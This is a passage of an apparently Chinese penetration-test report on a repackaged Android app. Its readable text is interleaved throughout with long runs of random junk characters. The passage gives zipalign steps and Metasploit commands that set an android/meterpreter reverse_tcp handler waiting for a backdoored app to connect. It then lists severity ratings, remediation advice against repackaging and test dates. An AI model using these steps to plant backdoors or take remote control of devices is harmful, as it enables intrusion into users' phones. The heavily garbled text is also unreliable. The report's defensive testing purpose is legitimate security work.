, D! G- E2 z2 W. k1 R, o# \ 1 q; Y' O$ P( o2 L' h 检查是否对齐 ' |; X- H$ \' Y' Y/ \. h % X. e) p/ [7 Z7 y: ]3 b

: X8 O/ Q; {" f1 v. G' K3 s8 D1 N j6 k3 Z/ S1 g7 |- f zipalign -c -v 4 final.apk * V4 F" m8 ?+ R b - r% i9 F* u- e9 i! f

1 I8 G1 |/ b ]0 z' T 5 h: r/ z8 P$ o+ C4 Y: P 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 6 i5 {3 d+ z2 V0 T9 a# }* ~7 ~& M# G ' S ]4 [) b5 d1 h r. h

" \) ?! n! Q0 t 6 f! L3 S1 K3 p; _( T0 B e 启动Metasploit控制台，配置参数等待上线 ' j+ w8 {; v8 a8 ^ b' t9 r & A+ o9 m3 c) x

+ u, k& `" Z$ ^3 s ) O5 t8 r$ X) c 在终端依次输入如下命令 8 a( h, V5 n) ^1 K2 ] ( z" B+ l A' P! ~* ?

& F) t6 }4 n2 }: M1 n+ w" H* |9 _3 V3 h! \" b; m1 w$ G8 C msfconsole ) ^% E3 L5 m4 h p6 M* t+ t 1 B# i0 x& H- G% D3 z& }* n

/ Q- G; S; w& k( D . |. G" r: T$ J- R use exploit/multi/handler 3 ?7 a! U$ I1 ^8 j4 ]3 u1 Q, e% S3 k) H3 z# Q* {

6 ^9 u: k5 U% Q# V, A1 } I2 I' X! W& F8 t8 p3 r& O set PAYLOAD android/meterpreter/reverse_tcp 6 Z$ X8 P. ^, c' h; x- i . `; S' a- X" Y4 @3 M6 B3 c. ]# S. v

4 u k+ T7 P. \1 g" ^* a* Z 6 f. Z& t% A& @0 B set LHOST 192.xxx.xx.xx ! V5 l8 Y" [' y& k: ~ _ ' ?; N! d3 o$ h+ `8 [9 a s9 N6 ~/ |

, p, k+ F- M7 ]6 w$ M 4 v. j. F" |* |7 Q( e+ a0 q% v set LPORT 4444 4 s- E# {3 b* {2 q ; {+ \3 l0 {6 U2 f% V3 o

4 ]0 J! L6 H O, S : y5 |& k e9 @3 u& I6 x exploit & x8 F; q: Z4 V+ @8 Y( F $ S0 v X# _$ Q3 X6 s

, T' S. D3 W4 n5 E$ X+ Z3 l 8 ^* [; {0 U* D7 j! X4 _. l 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 7 y0 f8 P2 l8 p8 v7 [; c 6 [$ P& Q# T* R/ R9 u9 |

7 {+ a& r5 Y" C& G* w+ T# w. W* ~ ) `' Z0 y0 N$ F0 `: C 漏洞危害：中 / Y$ B9 N- C6 {/ J2 S9 y+ t2 S t 9 O- @7 o2 ]9 t& k

( v' v. c" ]6 l2 [0 c [9 m 3 `# P! k# `' F& ?: e0 h/ W 9 m A& u0 a+ U: \9 ]8 K, W: f- X2 X" Q4 s8 C/ [ 严重程度 7 U2 v& X. I- E7 ^; _6 p$ ^ 4 `, \|) g* y7 C/ z. T( Q 3 z/ n* ?; j- T C3 j% J X' c$ s9 h ~	, B6 R" _# x4 l# @9 A" ]$ v 9 D( u! ]" y4 G/ {: O ( U/ N* T6 w$ i' W 7 t* j9 T8 W% [ j2 \6 h 高 8 s4 [4 X# o* U6 H' R9 v 7 A. W! Q; g$ B 4 j: Z K5 n8 h% t9 l $ k& M, n; \3 P" b	" M) ]& W, \9 [! O2 A3 z& L( v' \|( d7 ?8 {" `% ~. f; X : j! X- m* K) t& @1 s9 d1 g1 N8 Q2 Y- ^0 u ■ 8 c* u" L$ R/ ~' Z. \$ @* C/ e% G2 p: G( v1 ^. j& h* W* J # q% j U: V3 ]+ c3 E ?/ S8 p; R- @	" a$ Q5 [9 n! h: U' W# \2 B2 t& B+ l 4 V9 R/ q/ Y: k5 \|. s5 \; f/ m3 \|1 G9 S }; u 中 - Z& q6 w& C. G 6 l& f7 B7 F) A* Y" z( g% Q9 I/ X- l / n; h; t9 D, R3 V8 n4 u- K 6 J7 g& Z r# N A% a7 R	4 J! Z) J( E" c z* q$ t " c, `2 m! i0 f4 I* h ; h4 \|" a) \|- T9 A. ?# k( f, [ }+ ~9 j! g 8 }+ ]- v* W8 x. _5 [9 l " \|) [# x$ n3 I8 q# g. H; q : J8 U" G7 \|; E) a \|5 Z! p; f( ~$ j7 p" X2 g& z 6 u. q. ~3 E4 p$ Y' A1 U P/ _0 j4 T3 _, {* `( X	# y( x0 C' c& y ' w/ I. B. W/ P. Q; s3 B5 `: V + o+ X7 I8 e+ L2 y W' ^5 ^; U # z8 H2 L8 N/ f: w# Q- X 低 n1 }+ P+ X, A5 D 4 w C6 C" V- C% W 6 {4 w3 B7 ~" d8 Q& F" D' ~) j0 g $ n( M7 y/ k5 m3 x3 e5 E	; ?3 H- H6 Q& F c$ A * x6 L0 f0 e3 j" X$ F % Y6 j1 f% m5 v1 Y* l' e$ M" p & L# A$ v/ x) x6 a& G( T % F- X/ V G% r. s \|/ v* C( R7 F a8 [4 v& y 3 B u1 i4 ^4 f % \|- p3 P) w' f' `$ h* R 0 _- N0 i& l( o! ~4 j- m ' B9 ~3 e# E7 F# w( H' q% W" r

) W" u' |' u2 n) {3 V ( e. Z, D( r6 } p8 Q' c! n1 y 5 U- L- v4 b- ?* c6 D6 \( J 4 d7 c# ?/ L+ C+ Y

! P& f( j9 K$ g( D0 d# B' y$ q' i% }* v& [ 修复方法： 4 M. g6 n. \& k' x S* {3 d9 \$ r/ @ : y# p( w v6 ^

* n* z5 Q1 |& l% @ " C3 \8 i9 |$ A 1.在 APP 启动时应做签名校验防止二次打包。
' h1 t. N# c$ Z9 Q2 _: w# \& N - _) R/ o# |, A2 ?3 ~2 d7 E" d 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ; v2 {1 G4 ^4 K% r& o, { - U! ~6 W9 x: K

1 [9 N) X( H- p: q: ?) y : |3 ^8 U" ]5 I9 T% M, ^* C- V$ Y v* Z+ i! C: ]3 l% G) u' ?- Y- [8 X+ b& K9 \/ \8 u

5 A0 f# l9 t5 X6 d8 c4 i2 [ - h* R& n& ?( S8 p) @
1 e* b J1 ^" n, i" T; l; q6 P, Z 3 T& x, Z8 S! S1 Z u/ f- \5 j

7 d, T/ G5 s: {" _. Z* I: R7 M e2 f 6 _% T" R( \|% J- F8 i 1 T$ w& m; N4 Q# e; }% }1 r# v# E 渗透测试时间 5 J* m7 k; D7 l4 ^ 6 ]% W0 k1 m2 U8 a) h; r0 Y* p" r/ X ' D; K8 b" x1 u2 i * T5 r( t0 Q; b9 g- y. a
6 K, o# k) w' f" r1 D. M5 { ! W+ N+ n$ z* K. N8 H& y5 E# K 1 c3 _- \' }1 I/ \ S' I 0 n) _- q& w: }4 D3 R 起始时间 ! q f; ~0 }, v8 X; g, Z 9 O, W. b ?$ T( ^ , w- w# Q v, x & w" {7 x( N; r6 e( C3 L, ?. L	2 f" n; I5 J% D 8 A4 i9 F. ~$ x; o5 Z. U8 c: K 0 `; j& X4 g- j/ j 2 m& i9 e/ H4 @ 2020年4月6日 % O1 k4 o" U% t: P P3 x1 S4 y n1 [( o* y3 a9 \ 4 S* x; o% E8 `. a5 l6 W' B8 \|# v, @9 [) ^! _- U: {; W( n
0 `& p0 J& ?, \|- T+ x # E0 L H8 o# \) b- h1 x 6 x0 h6 V% O1 ~% k- U" `, K- e1 y* \ # Y6 S9 \|! a8 e/ Z7 c3 D& T 结束时间 2 L/ \|2 d- O6 G1 T$ A0 a& I8 v0 n9 ^ + \|; k% s4 Y9 q" U' { % y* t9 }* H; L7 K5 a0 I 0 T3 N- \0 b/ t	1 v# r, \3 A2 E- {2 {/ y7 K& ~5 j) l! R) O# j5 U' M+ C/ X$ ~ ( m8 ~6 C. t% V0 m$ G9 X! D3 U : { m( s6 Q/ _ S' ] 2020年4月9日 6 y+ Q: k W7 } 6 R: J9 S- y6 l0 y/ x% A2 x) B h9 L4 o# Z% L3 { Z, R' X * Y& O K( g6 E5 i! v* ^5 T' p/ U

/ o8 h5 p! a( {9 o' C; \|5 K/ n 4 U% O5 z& {. L1 W& G; ^ 6 f. ?( a ?( h$ @! \|0 R9 x: A0 P% k4 Z" W 序号 # S6 ^/ M$ l3 z& X+ q/ Q3 f2 q 0 B# l9 x$ b* `4 A % R. X; S5 M: s	# _) f& H+ z, e0 O. q. @1 @+ Z- v3 x / \( b; q9 e; J1 u7 b2 M # l* _- ~7 \' c" h4 B% I1 s 测试对象 7 L# b& {! a! S 9 l1 G+ G, Z/ x$ T7 S+ R2 n " i" C7 h/ z- U M9 i T4 O) \|& v! M. y. L$ A% A	. s# s- u9 D$ f! F0 [ 0 u) \|) \& m& b' q" Q 9 ^' I8 ]2 X3 z; W& K7 Z# h ( L. Y: a8 \|- Z5 O3 W 测试地址 4 A( \* z: U3 F( H " B" W3 q: v4 c! A+ u ' {. N# }; U- y. x* o( X5 s6 y9 U6 k3 G# n; N	& S9 U- F5 @$ p7 K6 y2 b: O 6 r7 F* F: X4 z+ W" c( j ( _6 W- b7 \. T! e& R3 ]" K" \5 x9 } 1 e5 V& @, Y9 I' l6 o9 _ 安全漏洞 $ q9 O/ n- D% Z [- \|) r I" g7 `: U+ F( s8 r2 b8 y; l 5 i! G- l5 j/ [ & _# D5 w) q3 Y
" T. l* j/ n& ?- F+ s$ l1 o: l* P! p: e. Q0 q" u ' v/ u( b8 H' w8 p/ @/ T 2 @) u8 \2 q5 C" ] 1 # f7 j2 ]4 M! u$ _+ o 6 P% f p; C# E : ?9 k1 O V; N. d ' w; N2 a" B8 k5 ~+ X: ^- @	: M1 r. ^7 S# H$ w 8 i3 X5 n/ X8 Y/ M ) W+ g+ ?: h8 ~# ^ 9 F/ ]! ?3 a3 f6 v$ F1 b" ~: w 某某某安卓APP 1 T) p C8 [4 D- J6 \1 Y5 C/ v9 f1 B3 w' v: w1 r # N% G' t) P U U/ O c/ r " L! J, d3 c( j	: L" W% l$ o- {. p 2 m2 y+ q3 Z1 O# G ) m# V5 _, E+ p( L2 x0 x2 x* l$ T- D6 }4 P! H3 A; K ) D) ~# I) P: V! D! ^1 R4 e! k9 Y0 q ! T: Z8 v8 n' s- e7 ` ; H& s7 A, G& T) v % @1 R( @. z* j! \|3 n	: {, f; [$ w6 ]# ~ . M1 ?9 D/ R# q7 h" L4 k Y1 f: R6 b4 Q% M" Z- m3 N* _5 w! X" }- P7 }( ?: F& C" B" _ 2 ! V; s& v4 o- Q' L) a % s1 I& a' n; l0 L8 P7 m( ~2 s6 l3 I* n . _% M. o& K- o6 [; m% a+ l3 i# n. z9 M # d. `8 u- ?4 r t

中国网络渗透测试联盟